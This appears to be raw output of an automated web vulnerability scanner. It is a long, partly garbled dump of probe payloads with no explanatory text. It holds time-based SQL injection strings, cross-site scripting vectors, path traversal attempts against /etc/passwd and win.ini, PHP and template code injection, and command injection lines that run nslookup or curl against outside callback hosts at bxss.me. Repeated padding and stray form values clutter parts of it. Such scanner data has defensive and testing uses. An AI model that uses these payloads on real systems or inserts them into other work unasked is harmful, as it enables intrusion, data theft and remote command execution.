@@7YZUK

����%2527%2522\'\"

'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1P2Hj5Weo')) OR 456=(SELECT 456 FROM PG_SLEEP(15))--

1zdDPfNW2') OR 813=(SELECT 813 FROM PG_SLEEP(15))--

1LiQdVr8j' OR 899=(SELECT 899 FROM PG_SLEEP(15))--

1-1)) OR 645=(SELECT 645 FROM PG_SLEEP(15))--

1-1) OR 114=(SELECT 114 FROM PG_SLEEP(15))--

1-1 OR 356=(SELECT 356 FROM PG_SLEEP(15))--

1ahvE6T50')); waitfor delay '0:0:15' --

1ny1DxZHX'); waitfor delay '0:0:15' --

1Cr3rV865'; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1-1)); waitfor delay '0:0:15' --

1<asQFGa5<

1<img sRc='http://attacker-9943/log.php?

1<a0qQ9Mz x=9913>

1<ifRAme sRc=9730.com></IfRamE>

1-1); waitfor delay '0:0:15' --

1<WPRDY8>ANXVL[!+!]</WPRDY8>

10HBaO

<InvalidTag >zl5U(9729)</ScRiPt>

1}body{zzz:Expre/**/SSion(zl5U(9704))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=zl5U(9112)>

�<img zzz onmouseover=zl5U(96831) //�>

1&lt;ScRiPt&gt;zl5U(9692)&lt;/sCripT&gt;

1-1; waitfor delay '0:0:15' --

1\u003CScRiPt\zl5U(9905)\u003C/sCripT\u003E

WEB-INF\web.xml

%31%3C%53%63%52%69%50%74%20%3E%7A%6C%35%55%289208%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9661)>

WEB-INF/web.xml

1<img src=xyz OnErRor=zl5U(9918)>

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<img src=//xss.bxss.me/t/dot.gif onload=zl5U(9795)>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

..\..\..\..\..\..\..\..\windows\win.ini

1<body onload=zl5U(9859)>

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9315'>

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1<isindex type=image src=1 onerror=zl5U(9333)>

1<svg

� onload=zl5U(9632);>

/../../../../../../../../../../boot.ini

1<InvalidTag

>zl5U(9242)</ScRiPt>

../../../../../../../../../../windows/win.ini%00.jpg

C:\WINDOWS\system32\drivers\etc\hosts

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9030></ScRiPt>

file:///etc/passwd

1<InvalidTag

>zl5U(9719)</ScRiPt>

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%7A%6C%35%55%28%39%32%34%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>zl5U(9104)</script>9104

../../../../../../../../../../../../../../windows/win.ini

1<InvalidTag>zl5U(9840)</script>

../../../../../../../../../../../../../../etc/passwd

1<W5LYYR>C7VVT[!+!]</W5LYYR>

1<InvalidTag >zl5U(9507)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

;(nslookup -q=cname hityumxvgfmfzffee2.bxss.me||curl hityumxvgfmfzffee2.bxss.me)|(nslookup -q=cname hityumxvgfmfzffee2.bxss.me||curl hityumxvgfmfzffee2.bxss.me)&(nslookup -q=cname hityumxvgfmfzffee2.bxss.me||curl hityumxvgfmfzffee2.bxss.me)

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

`(nslookup -q=cname hithjmivvjmwibadb6.bxss.me||curl hithjmivvjmwibadb6.bxss.me)`

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

1

/\xfs.bxss.me?hkbakels.com.hk

//xfs.bxss.me?hkbakels.com.hk

|(nslookup -q=cname hitmykkkmvdjtc3a96.bxss.me||curl hitmykkkmvdjtc3a96.bxss.me)

xfs.bxss.me?hkbakels.com.hk

&(nslookup -q=cname hiteovvptcqhff4cd4.bxss.me||curl hiteovvptcqhff4cd4.bxss.me)&'\"`0&(nslookup -q=cname hiteovvptcqhff4cd4.bxss.me||curl hiteovvptcqhff4cd4.bxss.me)&`'

http://xfs.bxss.me?hkbakels.com.hk

938433

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1

&nslookup -q=cname hitsulaygxfrx64652.bxss.me&'\"`0&nslookup -q=cname hitsulaygxfrx64652.bxss.me&`'

<th:t="${dfb}#foreach

xfs.bxss.me

$(nslookup -q=cname hitwgolsdeimx08567.bxss.me||curl hitwgolsdeimx08567.bxss.me)

bxss.me

1

(nslookup -q=cname hitcirgpkkwje69f2e.bxss.me||curl hitcirgpkkwje69f2e.bxss.me))

c:/windows/win.ini

|echo lkzhpj$()\ wyjlix\nz^xyu||a #' |echo lkzhpj$()\ wyjlix\nz^xyu||a #|" |echo lkzhpj$()\ wyjlix\nz^xyu||a #

<%={{={@{#{${dfb}}%>

&echo qnkizq$()\ lhwwti\nz^xyu||a #' &echo qnkizq$()\ lhwwti\nz^xyu||a #|" &echo qnkizq$()\ lhwwti\nz^xyu||a #

/etc/shells

bfgx10392%C0%BEz1%C0%BCz2a%90bcxhjl10392

http://bxss.me/t/fit.txt%3F.jpg

echo joykrq$()\ snxzrm\nz^xyu||a #' &echo joykrq$()\ snxzrm\nz^xyu||a #|" &echo joykrq$()\ snxzrm\nz^xyu||a #

Http://bxss.me/t/fit.txt

bfg2511%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl2511

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

19956511

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

1*if(now()=sysdate(),sleep(15),0)

'"()&%<zzz><InvalidTag >zl5U(9394)</ScRiPt>

1'"()&%<zzz><InvalidTag >zl5U(9174)</ScRiPt>


'.print(md5(31337)).'

${@print(md5(31337))}\

/\xfs.bxss.me?hkbakels.com.hk

<!--

'"

${@print(md5(31337))}



//xfs.bxss.me?hkbakels.com.hk


-1" OR 3*2>(0+5+237-237) --

";print(md5(31337));$a="

';print(md5(31337));$a='

-1" OR 3*2<(0+5+237-237) --


;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

-1" OR 3+237-237-1=0+0+0+1 --

WEB-INF\web.xml

bxss.me/t/xss.html?%00

19422990

-1" OR 2+237-237-1=0+0+0+1 --


'+'A'.concat(70-3).concat(22*4).concat(118).concat(76).concat(102).concat(65)+(require'socket'

Socket.gethostbyname('hitlr'+'liyjvtvtd0c75.bxss.me.')[3].to_s)+'


-1' OR 3+453-453-1=0+0+0+1 or '4wgpsg8o'='

WEB-INF/web.xml

HttP://bxss.me/t/xss.html?%00

"+"A".concat(70-3).concat(22*4).concat(122).concat(85).concat(107).concat(86)+(require"socket"

Socket.gethostbyname("hitfk"+"oiygnvsrdd966.bxss.me.")[3].to_s)+"

-1' OR 2+453-453-1=0+0+0+1 or '4wgpsg8o'='

'"()&%<zzz><InvalidTag >zl5U(9681)</ScRiPt>


unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

xfs.bxss.me?hkbakels.com.hk

"||sleep(27*1000)*vmdfnv||"

1'"()&%<zzz><InvalidTag >zl5U(9186)</ScRiPt>

"+response.write(9844652*9828701)+"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

-1' OR 3*2>(0+5+733-733) --

'||sleep(27*1000)*ycztdc||'

"&&sleep(27*1000)*auhsnc&&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1' OR 3*2<(0+5+733-733) --

'+response.write(9844652*9828701)+'

'&&sleep(27*1000)*zckmjw&&'


response.write(9844652*9828701)

<!--

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini



'"()

http://xfs.bxss.me?hkbakels.com.hk

-1' OR 3+733-733-1=0+0+0+1 --

'"


-1' OR 2+733-733-1=0+0+0+1 --

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

-1 OR 3+797-797-1=0+0+0+1

960526

..\..\..\..\..\..\..\..\windows\win.ini

-1 OR 2+797-797-1=0+0+0+1

xfs.bxss.me


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


-1 OR 3*2>(0+5+937-937) --


-1 OR 3*2<(0+5+937-937) --

bxss.me/t/xss.html?%00


bxss.me

^(#$!@#$)(()))******

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

HttP://bxss.me/t/xss.html?%00

!(()&&!|*|*|

'+'A'.concat(70-3).concat(22*4).concat(121).concat(78).concat(114).concat(67)+(require'socket'

/../../../../../../../../../../boot.ini

c:/windows/win.ini

"+"A".concat(70-3).concat(22*4).concat(111).concat(76).concat(109).concat(82)+(require"socket"

/etc/shells


${10000162+10000201}

-1 OR 3+937-937-1=0+0+0+1 --

../../../../../../../../../../windows/win.ini%00.jpg

http://bxss.me/t/fit.txt%3F.jpg

"+response.write(9282433*9571588)+"

)

C:\WINDOWS\system32\drivers\etc\hosts

<esi:include src="http://bxss.me/rpb.png"/>

'+response.write(9282433*9571588)+'

Http://bxss.me/t/fit.txt

-1 OR 2+937-937-1=0+0+0+1 --

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

response.write(9282433*9571588)

file:///etc/passwd

${9999825+9999789}

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

<esi:include src="http://bxss.me/rpb.png"/>

Mr.

1

555

../../../../../../../../../../../../../../windows/win.ini

;(nslookup -q=cname hitgjzigopbzl79d73.bxss.me||curl hitgjzigopbzl79d73.bxss.me)|(nslookup -q=cname hitgjzigopbzl79d73.bxss.me||curl hitgjzigopbzl79d73.bxss.me)&(nslookup -q=cname hitgjzigopbzl79d73.bxss.me||curl hitgjzigopbzl79d73.bxss.me)

`(nslookup -q=cname hitjgddirqzyd2c863.bxss.me||curl hitjgddirqzyd2c863.bxss.me)`

../../../../../../../../../../../../../../etc/passwd

".gethostbyname(lc("hitzd"."walvlmvvbc23b.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(65).chr(118).chr(84)."

'.gethostbyname(lc('hitpq'.'ifjawlczd2ae0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(76).chr(112).chr(76).'

./Mr.

1

555

XVV1781p

|(nslookup -q=cname hitfhstaaoqpy42659.bxss.me||curl hitfhstaaoqpy42659.bxss.me)

/../../../../../../../../../../windows/system32/BITSADMIN.exe

../Mr.

1

555


../Mr.

1

555

&(nslookup -q=cname hitevjuqzxrkka5c41.bxss.me||curl hitevjuqzxrkka5c41.bxss.me)&'\"`0&(nslookup -q=cname hitevjuqzxrkka5c41.bxss.me||curl hitevjuqzxrkka5c41.bxss.me)&`'

'.print(md5(31337)).'

"||sleep(27*1000)*doaeey||"

Mr.

1

555

&nslookup -q=cname hitbpmxnymctk60ab3.bxss.me&'\"`0&nslookup -q=cname hitbpmxnymctk60ab3.bxss.me&`'


$(nslookup -q=cname hitkqohojcviwd4dd3.bxss.me||curl hitkqohojcviwd4dd3.bxss.me)

${@print(md5(31337))}\


'||sleep(27*1000)*fgswdt||'

file:///etc/passwd

1

555

(nslookup -q=cname hitreixpveahb0da09.bxss.me||curl hitreixpveahb0da09.bxss.me))


|echo qumzfu$()\ fsnddo\nz^xyu||a #' |echo qumzfu$()\ fsnddo\nz^xyu||a #|" |echo qumzfu$()\ fsnddo\nz^xyu||a #

1a224ze8O

${@print(md5(31337))}

&n979703=v902390

"&&sleep(27*1000)*gcvgbk&&"

&echo aqytdq$()\ qbzpdw\nz^xyu||a #' &echo aqytdq$()\ qbzpdw\nz^xyu||a #|" &echo aqytdq$()\ qbzpdw\nz^xyu||a #

../../../../../../../../../../../../../../windows/win.ini

1

555


../../../../../../../../../../../../../../windows/win.ini

1

555

/../../../../../../../../../../windows/system32/BITSADMIN.exe

";print(md5(31337));$a="

echo jrjuuy$()\ hrqoyy\nz^xyu||a #' &echo jrjuuy$()\ hrqoyy\nz^xyu||a #|" &echo jrjuuy$()\ hrqoyy\nz^xyu||a #


fPSLRBce

../../../../../../../../../../../../../../etc/passwd

1

555


../../../../../../../../../../../../../../etc/passwd

1

555

';print(md5(31337));$a='

'&&sleep(27*1000)*propun&&'

Mr.

1

555

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

^(#$!@#$)(()))******

